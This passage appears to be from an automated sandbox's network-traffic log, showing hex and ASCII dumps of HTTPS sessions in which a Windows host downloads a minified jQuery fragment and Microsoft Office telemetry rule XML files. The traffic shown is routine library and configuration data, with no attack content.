                                                                                                                                                                                                                                                                                Data Ascii: RI,n=(e.ownerDocument||e).documentElement;return!Y.test(t||n&&n.nodeName||"HTML")},T=se.setDocument=function(e){var t,n,r=e?e.ownerDocument||e:m;return r!==C&&9===r.nodeType&&r.documentElement&&(a=(C=r).documentElement,E=!i(C),m!==C&&(n=C.defaultView)&&n.
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 65 74 75 72 6e 5b 5d 7d 7d 29 2c 62 2e 66 69 6e 64 2e 54 41 47 3d 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 3f 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3a 64 2e 71 73 61 3f 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 65 29 3a 76 6f 69 64 20 30 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 5b 5d 2c 69 3d 30 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 65 29 3b 69 66 28 22 2a 22 3d 3d 3d 65 29 7b 77 68 69 6c 65 28 6e 3d 6f 5b 69 2b 2b 5d 29 31
                                                                                                                                                                                                                                                                                Data Ascii: eturn[]}}),b.find.TAG=d.getElementsByTagName?function(e,t){return"undefined"!=typeof t.getElementsByTagName?t.getElementsByTagName(e):d.qsa?t.querySelectorAll(e):void 0}:function(e,t){var n,r=[],i=0,o=t.getElementsByTagName(e);if("*"===e){while(n=o[i++])1
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 3a 64 69 73 61 62 6c 65 64 22 29 2e 6c 65 6e 67 74 68 26 26 76 2e 70 75 73 68 28 22 3a 65 6e 61 62 6c 65 64 22 2c 22 3a 64 69 73 61 62 6c 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 2a 2c 3a 78 22 29 2c 76 2e 70 75 73 68 28 22 2c 2e 2a 3a 22 29 7d 29 29 2c 28 64 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 4b 2e 74 65 73 74 28 63 3d 61 2e 6d 61 74 63 68 65 73 7c 7c 61 2e 77 65 62 6b 69 74 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 6f 7a 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6f 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 7c 7c 61 2e 6d 73 4d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 29 29 26 26 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 64 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d
                                                                                                                                                                                                                                                                                Data Ascii: :disabled").length&&v.push(":enabled",":disabled"),e.querySelectorAll("*,:x"),v.push(",.*:")})),(d.matchesSelector=K.test(c=a.matches||a.webkitMatchesSelector||a.mozMatchesSelector||a.oMatchesSelector||a.msMatchesSelector))&&ce(function(e){d.disconnectedM
                                                                                                                                                                                                                                                                                2024-10-06 14:41:50 UTC1378INData Raw: 7d 29 2c 43 7d 2c 73 65 2e 6d 61 74 63 68 65 73 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 72 65 74 75 72 6e 20 73 65 28 65 2c 6e 75 6c 6c 2c 6e 75 6c 6c 2c 74 29 7d 2c 73 65 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 21 3d 3d 43 26 26 54 28 65 29 2c 64 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 26 26 45 26 26 21 41 5b 74 2b 22 20 22 5d 26 26 28 21 73 7c 7c 21 73 2e 74 65 73 74 28 74 29 29 26 26 28 21 76 7c 7c 21 76 2e 74 65 73 74 28 74 29 29 29 74 72 79 7b 76 61 72 20 6e 3d 63 2e 63 61 6c 6c 28 65 2c 74 29 3b 69 66 28 6e 7c 7c 64 2e 64 69 73 63 6f 6e 6e 65 63 74 65 64 4d 61 74 63 68 7c 7c 65 2e 64 6f 63 75 6d 65 6e 74 26 26 31 31
                                                                                                                                                                                                                                                                                Data Ascii: }),C},se.matches=function(e,t){return se(e,null,null,t)},se.matchesSelector=function(e,t){if((e.ownerDocument||e)!==C&&T(e),d.matchesSelector&&E&&!A[t+" "]&&(!s||!s.test(t))&&(!v||!v.test(t)))try{var n=c.call(e,t);if(n||d.disconnectedMatch||e.document&&11


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                3192.168.2.64972413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:51 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                Content-Length: 218853
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public
                                                                                                                                                                                                                                                                                Last-Modified: Fri, 04 Oct 2024 23:21:50 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DCE4CB535A72FA"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4dad204e-401e-005b-4bf5-169c0c000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144151Z-1657d5bbd48gqrfwecymhhbfm800000000vg00000000k0dr
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                                                Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                                                Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                                                Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                                                Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                                                Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                                                                                                                                                                                                                                                2024-10-06 14:41:51 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                                                                                                                                                                                                Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                4192.168.2.64972713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 3788
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BAC2126A6"
                                                                                                                                                                                                                                                                                x-ms-request-id: 4545068c-701e-0050-0e05-176767000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144153Z-1657d5bbd48qjg85buwfdynm5w000000029g000000002rcq
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                5192.168.2.64972913.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:53 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 2980
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                                                                                                                x-ms-request-id: 8aaf7b13-d01e-0028-46fd-167896000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144153Z-1657d5bbd48762wn1qw4s5sd300000000200000000009dsu
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                6192.168.2.64972813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:53 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
